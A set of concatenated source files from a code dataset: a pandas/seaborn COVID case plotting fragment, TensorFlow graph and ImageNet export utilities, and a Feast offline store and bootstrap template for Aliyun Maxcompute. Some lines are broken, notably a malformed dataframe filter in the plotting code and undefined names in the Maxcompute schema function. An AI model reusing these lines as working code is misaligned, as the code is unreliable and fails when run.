m=input("Enter the month: ")
state_info= df[(df['State/UnionTerritory']==c) & ( df['year']==y) & (df['month']==m)]
ax=sns.lineplot(
data=state_info,
x="Date", y="Confirmed"
)
plt.xticks(rotation=70)
plt.tight_layout()
ax.set_title('No of confimed cases for '+c+' in '+str(m)+str(y))
c=input("Enter the State or Union Territory name: ")
y=int(input("Enter the year: "))
m=input("Enter the month: ")
state_info= df[(df['State/UnionTerritory']==c) & ( ['df['year']==y) : (df['month']==m)']]
ax=sns.lineplot(
data=state_info,
x="Date", y="Confirmed"
)
plt.xticks(rotation=70)
plt.tight_layout()
ax.set_title('No of confimed cases for '+c+' in '+str(m)+str(y))
#all
c=input("Enter the State/UnionTerritory: ")
country=df[df['State/UnionTerritory']==c]
ax=sns.lineplot(
data=country,
x="month", y="Confirmed", hue='year',
)
#Death
ax=sns.lineplot(
data=country,
x="month", y="Deaths",hue='year',
)
ax=sns.lineplot(
data=country,
x="month", y="Cured",hue='year',
)
ax.set_title('No of all cases for '+c)
plt.xticks(rotation=70)
plt.tight_layout()
state=df[df['State/UnionTerritory']=='Punjab']
state=state.sort_values('Date')
state=state.groupby('Date')['Confirmed'].sum().reset_index()
state=state.set_index('Date')
y = state['Confirmed'].resample('MS').mean()
y[:'2020']
y.plot(figsize=(15, 6))
plt.show()
``` |
{
"source": "777ki/alibabacloud-pai-dsw-cn-demo",
"score": 2
} |
#### File: dawnbench_mlperf_dsw/cases/amp_util.py
```python
import sys
import pdb
import time
import tensorflow as tf
import numpy as np
from tensorflow.core.protobuf import rewriter_config_pb2
def load_graph(pb_file_path):
pb_graph_def = tf.GraphDef()
with open(pb_file_path, 'rb') as f:
pb_graph_def.ParseFromString(f.read())
return pb_graph_def
def save_graph(graph_def, pb_file_path):
with tf.gfile.FastGFile(pb_file_path, mode='wb') as f:
f.write(graph_def.SerializeToString())
return pb_file_path
def graph_to_pb(sess, graph, output_names):
input_graph_def = graph.as_graph_def()
from tensorflow.python.framework import graph_util
# We use a built-in TF helper to export variables to constant
output_graph_def = graph_util.convert_variables_to_constants(
sess,
input_graph_def,
output_node_names=output_names)
return output_graph_def
def load_savedmodel(model_path):
from tensorflow.python.saved_model import loader_impl
saved_model = loader_impl._parse_saved_model(model_path)
tf.reset_default_graph()
cfg = tf.ConfigProto(allow_soft_placement=True,
log_device_placement=False)
cfg.gpu_options.allow_growth = True
with tf.Session(config=cfg) as sess:
tags = saved_model.meta_graphs[0].meta_info_def.tags
meta_graph_def = tf.saved_model.loader.load(sess, tags, model_path)
sdef_key = meta_graph_def.signature_def.keys()[0]
tmp_outputs = meta_graph_def.signature_def[sdef_key].outputs.values()
model_outputs = [v.name[:-2] for v in tmp_outputs]
graph_def = tf.graph_util.convert_variables_to_constants(
sess, sess.graph_def, model_outputs)
graph_def = tf.graph_util.extract_sub_graph(graph_def, model_outputs)
for i,node in enumerate(graph_def.node):
if '_class' in node.attr.keys():
node.attr.pop('_class')
return graph_def
def getSessConfig():
gpu_options = tf.GPUOptions(allow_growth=True,
allocator_type='BFC',
per_process_gpu_memory_fraction=1.0)
config = tf.ConfigProto(log_device_placement=False,
allow_soft_placement=True,
gpu_options=gpu_options)
return config
def getOffLayoutConfig():
rewrite_options = rewriter_config_pb2.RewriterConfig(layout_optimizer=rewriter_config_pb2.RewriterConfig.OFF)
graph_options = tf.GraphOptions(rewrite_options=rewrite_options)
gpu_options = tf.GPUOptions(allow_growth=True,
allocator_type='BFC',
per_process_gpu_memory_fraction=1.0)
config = tf.ConfigProto(log_device_placement=False,
allow_soft_placement=True,
gpu_options=gpu_options,
graph_options = graph_options)
return config
def print_graph_infor(graph_def, logging):
for i,n in enumerate(graph_def.node):
logging.info(n.name)
#if (n.op == 'Conv2D'):
# logging.info("Name of the node - %s" % n.name)
# for j,n_input in enumerate(n.input):
# logging.info("input[{}] of the node {} - {}".format(j, n.name, n_input))
def flops_stat(graph, logging):
flops_ori = 0
params_ori = 0
for op in graph.get_operations():
if (op.type in ['Conv2D', 'MatMul']) and op.name.startswith('resnet_model'):
# NHWC, HWMN
if op.type == 'Conv2D':
flops_layer= op.outputs[0].shape[1] * op.outputs[0].shape[2] * \
np.prod(op.inputs[1].shape)
else:
flops_layer= np.prod(op.inputs[1].shape)
flops_layer *= 2
params_layer = np.prod(op.inputs[1].shape)
flops_ori += flops_layer
params_ori += params_layer
logging.info('Flops: {:}, Params: {:}, Input Shape: {:}, Output Shape: {:}, Kernel Shape: {:} of layer: {:}'.
format(flops_layer, params_layer, op.inputs[0].shape, op.outputs[0].shape, op.inputs[1].shape, op.name))
elif op.type in ['MaxPool']:
pool_size = 3
flops_layer= op.outputs[0].shape[1] * op.outputs[0].shape[2] * \
op.outputs[0].shape[3] * pool_size * pool_size
flops_ori += flops_layer
logging.info('Flops: {:} of layer: {:}'.format(flops_layer, op.name))
logging.info('Total flops: {:}, and total params: {:}'.format(flops_ori, params_ori))
def extract_graph_node(graph_def, logging):
activate_dict = {}
kernel_dict = {}
act_kernel_list = []
op_kernel_list = []
for i,n in enumerate(graph_def.node):
if (n.op in ['Conv2D', 'MatMul']): # 'MatMul'
logging.info("Name of the node - %s" % n.name)
act_name = n.input[0]+':0'
activate_dict[act_name] = [] # input tensor name, scaling factor
logging.info("input[{}] of the node {} - {}".format(0, n.name, act_name))
if 'read' in n.input[1]:
kernel_name = n.input[1][:-5] # kernel const node name
else:
kernel_name = n.input[1] # kernel const node name
logging.info("input[{}] of the node {} - {}".format(1, n.name, kernel_name))
kernel_dict[kernel_name] = 1. # kernel const node name, scaling factor
act_kernel_list.append((act_name, kernel_name))
op_kernel_list.append((act_name, n.name, kernel_name))
return activate_dict, kernel_dict, act_kernel_list, op_kernel_list
```
#### File: alibabacloud-pai-dsw-cn-demo/dawnbench_mlperf_dsw/imagenet_export.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import oss2
import argparse
import logging
import tensorflow as tf # pylint: disable=g-bad-import-order
from imagenet_main import *
from utils.export import export
from quantize.quant_hooks_v2 import QuantHook
import tensorflow_io.oss
import tensorflow_io.oss.python.ops.ossfs_ops
parser = argparse.ArgumentParser(description='TF Graph Test')
parser.add_argument('--model-dir', default='./ft_model/', type=str,
help='model path')
parser.add_argument('--data-dir', default='/data/ImageNet_TFRecorder', type=str,
help='model path')
parser.add_argument('--pickle-model', default='./gap_save/gap_pruned.pkl', type=str,
help='pickle path')
parser.add_argument('--final-size', default=2048, type=int, metavar='N',
help='final size')
parser.add_argument('--export-dir', default='./export/', type=str,
help='export path')
parser.add_argument('--enable-quantize', '-eqz', action='store_true',
help='if True quantization is enabled.')
parser.add_argument('--q-bits', default=4, type=int, metavar='N',
help='quantization bits')
parser.add_argument("--oss_load", "-osl", action='store_true',
help="[default: %(default)s] oss_load: If True dataset is loaded from oss.")
parser.add_argument('--log-name', type=str, default='export_eval', help='log name')
args = parser.parse_args()
# set logging system
logging.basicConfig(level=logging.INFO,
format='[%(asctime)s] %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S',
filename='export/'+args.log_name+'.log')
logging.info(args)
_BATCH_SIZE = 256
_LABEL_CLASSES = 1001
_DEFAULT_IMAGE_SIZE = 224
_NUM_CHANNELS = 3
_NUM_IMAGES = {
'train': 1281167,
'validation': 50000,
}
_NUM_TRAIN_FILES = 8
_SHUFFLE_BUFFER = 1500
_ACCESS_ID = "<TBD>"
_ACCESS_KEY = "<TBD>"
_HOST = "<TBD>"
_BUCKET = "<TBD>"
if args.oss_load:
auth = oss2.Auth(_ACCESS_ID, _ACCESS_KEY)
bucket = oss2.Bucket(auth, _HOST, _BUCKET)
shape=[_DEFAULT_IMAGE_SIZE, _DEFAULT_IMAGE_SIZE, _NUM_CHANNELS]
# create estimator
session_config = tf.ConfigProto(
inter_op_parallelism_threads=0,
intra_op_parallelism_threads=0,
allow_soft_placement=True)
distribution = tf.contrib.distribute.OneDeviceStrategy('device:GPU:0')
run_config = tf.estimator.RunConfig(train_distribute=distribution,
session_config=session_config)
classifier = tf.estimator.Estimator(
model_fn=imagenet_model_fn,
model_dir=args.model_dir, config=run_config,
params={
'resnet_size': 26,
'final_size': args.final_size,
'pickle_model': args.pickle_model,
'random_init': False,
'data_format': "channels_last",
'batch_size': _BATCH_SIZE,
'train_epochs': 1,
'version': 34,
'version_t': 1,
'loss_scale': 1,
'gap_train': False,
'gap_lambda': 0.00001,
'gap_ft': False,
'gap_start': 0,
'dtype': tf.float32,
'learn_rate': 0.1,
'label_smoothing': 0.,
'enable_lars': False,
'enable_cos': False,
'cos_alpha': 0.001,
'warm_up': False,
'weight_decay': 0.00001,
'fine_tune': False,
'enable_kd': False,
'kd_size': 50,
'temp_dst': 1.,
'w_dst': 1.,
'mix_up': False,
'mx_mode': 0,
'enable_quantize': False,
'online_quantize': False,
'enable_at': False,
'w_at': 2.,
})
# create input_fn
def input_fn_eval():
return input_fn(
is_training=False,
data_dir=args.data_dir,
batch_size=_BATCH_SIZE,
num_epochs=1,
dtype=tf.float32,
oss_load=args.oss_load
)
eval_hooks = None
if args.enable_quantize:
quant_eval_hook = QuantHook(bits=args.q_bits)
eval_hooks = [quant_eval_hook]
# evaluation
eval_results = classifier.evaluate(input_fn=input_fn_eval,
steps=None,
hooks=eval_hooks)
logging.info(eval_results)
# save the model
logging.info('Export the saved model!')
input_receiver_fn = export.build_tensor_serving_input_receiver_fn(
shape, batch_size=None, dtype=tf.float32)
classifier.export_saved_model(args.export_dir, input_receiver_fn)
logging.info('Finished export!')
``` |
{
"source": "777ki/feast",
"score": 2
} |
#### File: infra/offline_stores/maxcompute.py
```python
import uuid
from datetime import date, datetime, timedelta
from typing import Dict, List, Optional, Union
import numpy as np
import pandas as pd
import pyarrow
from pydantic import StrictStr
from pydantic.typing import Literal
from tenacity import Retrying, retry_if_exception_type, stop_after_delay, wait_fixed
from feast.data_source import DataSource
from feast.errors import (
FeastProviderLoginError,
InvalidEntityType,
MaxcomputeJobCancelled,
MaxcomputeJobStillRunning,
MaxcomputeQueryError,
MaxcomputeUploadError,
)
from feast.feature_view import FeatureView
from feast.infra.offline_stores import offline_utils
from feast.infra.offline_stores.offline_store import OfflineStore, RetrievalJob
from feast.infra.utils import aliyun_utils
from feast.on_demand_feature_view import OnDemandFeatureView
from feast.registry import Registry
from feast.repo_config import FeastConfigBaseModel, RepoConfig
from .maxcompute_source import MaxcomputeSource
try:
import odps
from odps import ODPS, options
options.sql.use_odps2_extension = True
options.tunnel.use_instance_tunnel = True
options.tunnel.limit_instance_tunnel = False
except ImportError as e:
from feast.errors import FeastExtrasDependencyImportError
raise FeastExtrasDependencyImportError("aliyun", str(e))
class MaxcomputeOfflineStoreConfig(FeastConfigBaseModel):
""" Offline store config for Aliyun Maxcompute """
type: Literal["maxcompute"] = "maxcompute"
""" Offline store type selector"""
region: Optional[StrictStr] = None
""" (optional)Macompute region name"""
project: StrictStr
""" Maxcompute project name"""
access_key: StrictStr
""" Maxcompute access key"""
secret_access_key: StrictStr
""" Maxcompute secret access key"""
end_point: Optional[StrictStr] = None
""" (optional)Maxcompute endpoint"""
class MaxcomputeOfflineStore(OfflineStore):
@staticmethod
def pull_latest_from_table_or_query(
config: RepoConfig,
data_source: DataSource,
join_key_columns: List[str],
feature_name_columns: List[str],
event_timestamp_column: str,
created_timestamp_column: Optional[str],
start_date: datetime,
end_date: datetime,
) -> RetrievalJob:
assert isinstance(data_source, MaxcomputeSource)
from_expression = data_source.get_table_query_string()
partition_by_join_key_string = ", ".join(join_key_columns)
if partition_by_join_key_string != "":
partition_by_join_key_string = (
"PARTITION BY " + partition_by_join_key_string
)
timestamps = [event_timestamp_column]
if created_timestamp_column:
timestamps.append(created_timestamp_column)
timestamp_desc_string = " DESC, ".join(timestamps) + " DESC"
field_string = ", ".join(join_key_columns + feature_name_columns + timestamps)
# client = aliyun_utils.get_maxcompute_client(project=config.offline_store.project)
client = aliyun_utils.get_maxcompute_client(
ak=config.offline_store.access_key,
sk=config.offline_store.secret_access_key,
project=config.offline_store.project,
region=config.offline_store.region,
endpoint=config.offline_store.end_point,
)
query = f"""
SELECT {field_string}
FROM (
SELECT {field_string},
ROW_NUMBER() OVER({partition_by_join_key_string} ORDER BY {timestamp_desc_string}) AS _feast_row
FROM {from_expression}
WHERE cast({event_timestamp_column} as TIMESTAMP) BETWEEN TIMESTAMP('{start_date}') AND TIMESTAMP('{end_date}')
)
WHERE _feast_row = 1
"""
# When materializing a single feature view, we don't need full feature names. On demand transforms aren't materialized
return MaxcomputeRetrievalJob(
query=query,
client=client,
config=config,
full_feature_names=False,
on_demand_feature_views=None,
)
@staticmethod
def get_historical_features(
config: RepoConfig,
feature_views: List[FeatureView],
feature_refs: List[str],
entity_df: Union[pd.DataFrame, odps.df.DataFrame, str],
registry: Registry,
project: str,
full_feature_names: bool = False,
) -> RetrievalJob:
# TODO: Add entity_df validation in order to fail before interacting with Maxcompute
assert isinstance(config.offline_store, MaxcomputeOfflineStoreConfig)
client = aliyun_utils.get_maxcompute_client(
ak=config.offline_store.access_key,
sk=config.offline_store.secret_access_key,
project=config.offline_store.project,
region=config.offline_store.region,
endpoint=config.offline_store.end_point,
)
assert isinstance(config.offline_store, MaxcomputeOfflineStoreConfig)
# local pandas data frame need upload
if isinstance(entity_df, str):
table_reference = entity_df
else:
table_reference = _get_table_reference_for_new_entity(
client, config.offline_store.project
)
entity_schema = _upload_entity_df_and_get_entity_schema(
client=client, table_name=table_reference, entity_df=entity_df
)
entity_df_event_timestamp_col = offline_utils.infer_event_timestamp_from_entity_df(
entity_schema
)
expected_join_keys = offline_utils.get_expected_join_keys(
project, feature_views, registry
)
offline_utils.assert_expected_columns_in_entity_df(
entity_schema, expected_join_keys, entity_df_event_timestamp_col
)
# Build a query context containing all information required to template the Maxcompute SQL query
query_context = offline_utils.get_feature_view_query_context(
feature_refs, feature_views, registry, project
)
# Generate the Maxcompute SQL query from the query context
query = offline_utils.build_point_in_time_query(
query_context,
left_table_query_string=table_reference,
entity_df_event_timestamp_col=entity_df_event_timestamp_col,
query_template=MULTIPLE_FEATURE_VIEW_POINT_IN_TIME_JOIN,
full_feature_names=full_feature_names,
)
return MaxcomputeRetrievalJob(
query=query,
client=client,
config=config,
full_feature_names=full_feature_names,
on_demand_feature_views=registry.list_on_demand_feature_views(
project, allow_cache=True
),
)
class MaxcomputeRetrievalJob(RetrievalJob):
def __init__(
self,
query: str,
client: ODPS,
config: RepoConfig,
full_feature_names: bool,
on_demand_feature_views: Optional[List[OnDemandFeatureView]],
):
self.query = query
self.client = client
self.config = config
self._full_feature_names = full_feature_names
self._on_demand_feature_views = on_demand_feature_views
@property
def full_feature_names(self) -> bool:
return self._full_feature_names
@property
def on_demand_feature_views(self) -> Optional[List[OnDemandFeatureView]]:
return self._on_demand_feature_views
def to_df_internal(self) -> pd.DataFrame:
# TODO: Ideally only start this job when the user runs "get_historical_features", not when they run to_df()
df = self._to_df()
return df
def to_sql(self) -> str:
"""
Returns the SQL query that will be executed in Maxcompute to build the historical feature table.
"""
return self.query
def to_maxcompute(self, table_name: str,overwrite:bool = True) -> None:
"""
Triggers the execution of a historical feature retrieval query and exports the results to a Maxcompute table.
Args:
table_name: specify name of destination table
"""
if overwrite:
sql = f"DROP TABLE IF EXISTS {table_name}"
job = self.client.run_sql(sql)
print("logview url:", job.get_logview_address())
query = self.query
sql = f"CREATE TABLE {table_name} LIFECYCLE 1 AS {query}"
job = self.client.run_sql(sql)
print("logview url:", job.get_logview_address())
job.wait_for_success()
def _to_df(self) -> pd.DataFrame:
table_reference = _get_table_reference_for_new_entity(
self.client, self.config.offline_store.project
)
query = self.query
sql = f"CREATE TABLE {table_reference} LIFECYCLE 1 AS {query}"
job = self.client.run_sql(sql)
print("logview url:", job.get_logview_address())
job.wait_for_success()
table = odps.df.DataFrame(self.client.get_table(table_reference))
return table.to_pandas()
def to_arrow(self) -> pyarrow.Table:
df = self._to_df()
return pyarrow.Table.from_pandas(df)
def _get_table_reference_for_new_entity(client: ODPS, dataset_project: str) -> str:
"""Gets the table_id for the new entity to be uploaded."""
table_name = offline_utils.get_temp_entity_table_name()
return f"{dataset_project}.{table_name}"
def _upload_entity_df_and_get_entity_schema(
client: ODPS,
table_name: str,
entity_df: Union[pd.DataFrame, odps.df.DataFrame, str],
) -> Dict[str, np.dtype]:
"""Uploads a Pandas entity dataframe into a Maxcompute table and returns the resulting table"""
if type(entity_df) is str:
limited_entity_df = (
odps.df.DataFrame(client.get_table(table_name)).limit(1).execute()
)
entity_schema = dict(
zip(limited_entity_df.schema.names, limited_entity_df.schema.types)
)
elif isinstance(entity_df, pd.DataFrame):
# Drop the index so that we dont have unnecessary columns
entity_df.reset_index(drop=True, inplace=True)
# Upload the dataframe into Maxcompute, creating a temporary table
upload_df = odps.df.DataFrame(entity_df)
try:
upload_df.persist(table_name, odps=client, lifecycle=1)
except Exception as e:
raise MaxcomputeUploadError(e)
entity_schema = dict(zip(upload_df.dtypes.names, upload_df.dtypes.types))
elif isinstance(entity_df, odps.df.DataFrame):
# Just return the Maxcompute schema
entity_schema = dict(zip(entity_df.dtypes.names, entity_df.dtypes.types))
else:
raise InvalidEntityType(type(entity_df))
return entity_schema
# TODO: Optimizations
# * Use GENERATE_UUID() instead of ROW_NUMBER(), or join on entity columns directly
# * Precompute ROW_NUMBER() so that it doesn't have to be recomputed for every query on entity_dataframe
# * Create temporary tables instead of keeping all tables in memory
# Note: Keep this in sync with sdk/python/feast/infra/offline_stores/redshift.py:MULTIPLE_FEATURE_VIEW_POINT_IN_TIME_JOIN
MULTIPLE_FEATURE_VIEW_POINT_IN_TIME_JOIN = """
--Compute a deterministic hash for the `left_table_query_string` that will be used throughout
--all the logic as the field to GROUP BY the data
WITH entity_dataframe AS (
SELECT *,
CAST({{entity_df_event_timestamp_col}} AS TIMESTAMP) AS entity_timestamp
{% for featureview in featureviews %}
,CONCAT(
{% for entity in featureview.entities %}
CAST({{entity}} AS STRING),
{% endfor %}
CAST({{entity_df_event_timestamp_col}} AS STRING)
) AS {{featureview.name}}__entity_row_unique_id
{% endfor %}
FROM {{ left_table_query_string }}
),
{% for featureview in featureviews %}
{{ featureview.name }}__entity_dataframe AS (
SELECT
{{ featureview.entities | join(', ')}},
cast(entity_timestamp as TIMESTAMP),
{{featureview.name}}__entity_row_unique_id
FROM entity_dataframe
GROUP BY {{ featureview.entities | join(', ')}}, entity_timestamp, {{featureview.name}}__entity_row_unique_id
),
-- This query template performs the point-in-time correctness join for a single feature set table
-- to the provided entity table.
--
-- 1. We first join the current feature_view to the entity dataframe that has been passed.
-- This JOIN has the following logic:
-- - For each row of the entity dataframe, only keep the rows where the `event_timestamp_column`
-- is less than the one provided in the entity dataframe
-- - If there a TTL for the current feature_view, also keep the rows where the `event_timestamp_column`
-- is higher the the one provided minus the TTL
-- - For each row, Join on the entity key and retrieve the `entity_row_unique_id` that has been
-- computed previously
--
-- The output of this CTE will contain all the necessary information and already filtered out most
-- of the data that is not relevant.
{{ featureview.name }}__subquery AS (
SELECT
cast({{ featureview.event_timestamp_column }} as TIMESTAMP) as event_timestamp,
{{ featureview.created_timestamp_column ~ ' as created_timestamp,' if featureview.created_timestamp_column else '' }}
{{ featureview.entity_selections | join(', ')}},
{% for feature in featureview.features %}
{{ feature }} as {% if full_feature_names %}{{ featureview.name }}__{{feature}}{% else %}{{ feature }}{% endif %}{% if loop.last %}{% else %}, {% endif %}
{% endfor %}
FROM {{ featureview.table_subquery }}
WHERE cast({{ featureview.event_timestamp_column }} as TIMESTAMP) <= (SELECT MAX(entity_timestamp) FROM entity_dataframe)
{% if featureview.ttl == 0 %}{% else %}
AND cast({{ featureview.event_timestamp_column }} as TIMESTAMP) >= DATEADD((SELECT MIN(entity_timestamp) FROM entity_dataframe), -{{ featureview.ttl }}, "ss")
{% endif %}
),
{{ featureview.name }}__base AS (
SELECT
/*+ mapjoin({{ featureview.name }}__entity_dataframe)*/ subquery.*,
entity_dataframe.entity_timestamp,
entity_dataframe.{{featureview.name}}__entity_row_unique_id
FROM {{ featureview.name }}__subquery AS subquery
JOIN {{ featureview.name }}__entity_dataframe AS entity_dataframe
ON TRUE
AND subquery.event_timestamp <= entity_dataframe.entity_timestamp
{% if featureview.ttl == 0 %}{% else %}
AND subquery.event_timestamp >= DATEADD(entity_dataframe.entity_timestamp, -{{ featureview.ttl }}, "ss")
{% endif %}
{% for entity in featureview.entities %}
AND subquery.{{ entity }} = entity_dataframe.{{ entity }}
{% endfor %}
),
-- 2. If the `created_timestamp_column` has been set, we need to
-- deduplicate the data first. This is done by calculating the
-- `MAX(created_at_timestamp)` for each event_timestamp.
-- We then join the data on the next CTE
{% if featureview.created_timestamp_column %}
{{ featureview.name }}__dedup AS (
SELECT
{{featureview.name}}__entity_row_unique_id,
event_timestamp,
MAX(created_timestamp) as created_timestamp
FROM {{ featureview.name }}__base
GROUP BY {{featureview.name}}__entity_row_unique_id, event_timestamp
),
{% endif %}
-- 3. The data has been filtered during the first CTE "*__base"
-- Thus we only need to compute the latest timestamp of each feature.
{{ featureview.name }}__latest AS (
SELECT
{{featureview.name}}__entity_row_unique_id,
event_timestamp,
created_timestamp
FROM
(
SELECT *,
ROW_NUMBER() OVER(
PARTITION BY {{featureview.name}}__entity_row_unique_id
ORDER BY event_timestamp DESC{% if featureview.created_timestamp_column %},created_timestamp DESC{% endif %}
) AS row_number
FROM {{ featureview.name }}__base
{% if featureview.created_timestamp_column %}
JOIN {{ featureview.name }}__dedup
USING ({{featureview.name}}__entity_row_unique_id, event_timestamp, created_timestamp)
{% endif %}
)
WHERE row_number = 1
),
-- 4. Once we know the latest value of each feature for a given timestamp,
-- we can join again the data back to the original "base" dataset
{{ featureview.name }}__cleaned AS (
SELECT base.*,
{{featureview.name}}__entity_row_unique_id
FROM {{ featureview.name }}__base as base
JOIN {{ featureview.name }}__latest
USING(
{{featureview.name}}__entity_row_unique_id,
event_timestamp
{% if featureview.created_timestamp_column %}
,created_timestamp
{% endif %}
)
){% if loop.last %}{% else %}, {% endif %}
{% endfor %}
-- Joins the outputs of multiple time travel joins to a single table.
-- The entity_dataframe dataset being our source of truth here.
SELECT *
FROM entity_dataframe
{% for featureview in featureviews %}
LEFT JOIN (
SELECT
{{featureview.name}}__entity_row_unique_id
{% for feature in featureview.features %}
,{% if full_feature_names %}{{ featureview.name }}__{{feature}}{% else %}{{ feature }}{% endif %}
{% endfor %}
FROM {{ featureview.name }}__cleaned
) {{ featureview.name }}__u USING ({{featureview.name}}__entity_row_unique_id)
{% endfor %}
"""
```
#### File: infra/offline_stores/maxcompute_source.py
```python
from typing import Callable, Dict, Iterable, Optional, Tuple
from feast import type_map
from feast.data_source import DataSource
from feast.errors import DataSourceNotFoundException
from feast.infra.utils import aliyun_utils
from feast.protos.feast.core.DataSource_pb2 import DataSource as DataSourceProto
from feast.repo_config import RepoConfig
from feast.value_type import ValueType
class MaxcomputeSource(DataSource):
def __init__(
self,
event_timestamp_column: Optional[str] = "",
table_ref: Optional[str] = None,
created_timestamp_column: Optional[str] = "",
field_mapping: Optional[Dict[str, str]] = None,
date_partition_column: Optional[str] = "",
query: Optional[str] = None,
):
self._maxcompute_options = MaxcomputeOptions(table_ref=table_ref, query=query)
super().__init__(
event_timestamp_column,
created_timestamp_column,
field_mapping,
date_partition_column,
)
def __eq__(self, other):
if not isinstance(other, MaxcomputeSource):
raise TypeError(
"Comparisons should only involve MaxcomputeSource class objects."
)
return (
self.maxcompute_options.table_ref == other.maxcompute_options.table_ref
and self.maxcompute_options.query == other.maxcompute_options.query
and self.event_timestamp_column == other.event_timestamp_column
and self.created_timestamp_column == other.created_timestamp_column
and self.field_mapping == other.field_mapping
)
@property
def table_ref(self):
return self._maxcompute_options.table_ref
@property
def query(self):
return self._maxcompute_options.query
@property
def maxcompute_options(self):
"""
Returns the maxcompute options of this data source
"""
return self._maxcompute_options
@maxcompute_options.setter
def maxcompute_options(self, maxcompute_options):
"""
Sets the maxcompute options of this data source
"""
self._maxcompute_options = maxcompute_options
@staticmethod
def from_proto(data_source: DataSourceProto):
assert data_source.HasField("maxcompute_options")
return MaxcomputeSource(
field_mapping=dict(data_source.field_mapping),
table_ref=data_source.maxcompute_options.table_ref,
event_timestamp_column=data_source.event_timestamp_column,
created_timestamp_column=data_source.created_timestamp_column,
date_partition_column=data_source.date_partition_column,
query=data_source.maxcompute_options.query,
)
def to_proto(self) -> DataSourceProto:
data_source_proto = DataSourceProto(
type=DataSourceProto.BATCH_BIGQUERY,
field_mapping=self.field_mapping,
maxcompute_options=self.maxcompute_options.to_proto(),
)
data_source_proto.event_timestamp_column = self.event_timestamp_column
data_source_proto.created_timestamp_column = self.created_timestamp_column
data_source_proto.date_partition_column = self.date_partition_column
return data_source_proto
def validate(self, config: RepoConfig):
from odps.errors import NoSuchObject as NoSuchObject
if not self.query:
client = aliyun_utils.get_maxcompute_client(
ak=config.offline_store.access_key,
sk=config.offline_store.secret_access_key,
project=config.offline_store.project,
region=config.offline_store.region,
endpoint=config.offline_store.end_point,
)
try:
client.get_table(self.table_ref)
except NoSuchObject:
raise DataSourceNotFoundException(self.table_ref)
def get_table_query_string(self) -> str:
"""Returns a string that can directly be used to reference this table in SQL"""
if self.table_ref:
return f"`{self.table_ref}`"
else:
return f"({self.query})"
@staticmethod
def source_datatype_to_feast_value_type() -> Callable[[str], ValueType]:
return type_map.mc_to_feast_value_type
def get_table_column_names_and_types(
self, config: RepoConfig
) -> Iterable[Tuple[str, str]]:
client = aliyun_utils.get_maxcompute_client(
ak=config.offline_store.access_key,
sk=config.offline_store.secret_access_key,
project=config.offline_store.project,
region=config.offline_store.region,
endpoint=config.offline_store.end_point,
)
if self.table_ref is not None:
table_schema = client.get_table(self.table_ref).schema
if not isinstance(
table_schema[0], odps.models.table.TableSchema.TableColumn
):
raise TypeError("Could not parse Maxcompute table schema.")
name_type_pairs = [(field.name, field.type) for field in schema]
else:
mc_columns_query = f"SELECT * FROM ({self.query}) LIMIT 1"
queryRes = client.execute_sql(mc_columns_query)
with queryRes.open_reader() as reader:
for row in reader:
name_type_pairs = [
(schema.name, schema.type) for schema in row._columns
]
break
return name_type_pairs
class MaxcomputeOptions:
"""
DataSource Maxcompute options used to source features from Aliyun Maxcompute query
"""
def __init__(self, table_ref: Optional[str], query: Optional[str]):
self._table_ref = table_ref
self._query = query
@property
def query(self):
"""
Returns the Maxcompute SQL query referenced by this source
"""
return self._query
@query.setter
def query(self, query):
"""
Sets the Maxcompute SQL query referenced by this source
"""
self._query = query
@property
def table_ref(self):
"""
Returns the table ref of this BQ table
"""
return self._table_ref
@table_ref.setter
def table_ref(self, table_ref):
"""
Sets the table ref of this BQ table
"""
self._table_ref = table_ref
@classmethod
def from_proto(cls, maxcompute_options_proto: DataSourceProto.MaxcomputeOptions):
"""
Creates a MaxcomputeOptions from a protobuf representation of a Maxcompute option
Args:
maxcompute_options_proto: A protobuf representation of a DataSource
Returns:
Returns a MaxcomputeOptions object based on the maxcompute_options protobuf
"""
maxcompute_options = cls(
table_ref=maxcompute_options_proto.table_ref,
query=maxcompute_options_proto.query,
)
return maxcompute_options
def to_proto(self) -> DataSourceProto.MaxcomputeOptions:
"""
Converts an MaxcomputeOptionsProto object to its protobuf representation.
Returns:
MaxcomputeOptionsProto protobuf
"""
maxcompute_options_proto = DataSourceProto.MaxcomputeOptions(
table_ref=self.table_ref, query=self.query
)
return maxcompute_options_proto
```
#### File: templates/aliyun/bootstrap.py
```python
import click
import odps
from feast.infra.utils import aliyun_utils
import pandas as pd
import time
def replace_str_in_file(file_path, match_str, sub_str):
with open(file_path, "r") as f:
contents = f.read()
contents = contents.replace(match_str, sub_str)
with open(file_path, "wt") as f:
f.write(contents)
def bootstrap():
# Bootstrap() will automatically be called from the init_repo() during `feast init`
import pathlib
from datetime import datetime, timedelta
from feast.driver_test_data import create_driver_hourly_stats_df
end_date = datetime.now().replace(microsecond=0, second=0, minute=0)
start_date = end_date - timedelta(days=15)
driver_entities = [1001, 1002, 1003, 1004, 1005]
driver_df = create_driver_hourly_stats_df(driver_entities, start_date, end_date)
ak = click.prompt("Aliyun access key")
sk = click.prompt("Aliyun sercet key")
p = click.prompt("Maxcompute project")
region = click.prompt("Maxcompute region")
endpoint = click.prompt("Maxcompute endpoint")
holo_host = click.prompt("Aliyun Hologres host")
holo_port = click.prompt("Aliyun Hologres port")
holo_db = click.prompt("Aliyun Hologres db")
client = client = aliyun_utils.get_maxcompute_client(
ak=ak,
sk=sk,
project=p,
region=region,
endpoint=endpoint,
)
if click.confirm(
"Should I upload example data to Maxcompute (overwriting 'feast_driver_hourly_stats' table)?",
default=True,
):
upload_df = odps.df.DataFrame(driver_df)
upload_df.persist("feast_driver_hourly_stats", odps=client, lifecycle=1)
print("upload `feast_driver_hourly_stats` succ!")
if click.confirm(
"Should I upload entity data to Maxcompute (overwriting 'feast_driver_entity_table' table)?",
default=True,
):
entity_df = pd.DataFrame(
{
"event_timestamp": [
pd.Timestamp(dt, unit="ms", tz="UTC").round("ms")
for dt in pd.date_range(
start=datetime.now() - timedelta(days=2),
end=datetime.now(),
periods=2,
)
],
"driver_id": [1004, 1005],
}
)
upload_df = odps.df.DataFrame(entity_df)
upload_df.persist("feast_driver_entity_table", odps=client, lifecycle=1)
print("upload `feast_driver_entity_table` succ!")
repo_path = pathlib.Path(__file__).parent.absolute()
config_file = repo_path / "feature_store.yaml"
replace_str_in_file(config_file, "%ALIYUN_REGION%", region)
replace_str_in_file(config_file, "%ALIYUN_ACCESS_KEY%", ak)
replace_str_in_file(config_file, "%ALIYUN_SECRET_KEY%", sk)
replace_str_in_file(config_file, "%MAXCOMPUTE_PROJECT%", p)
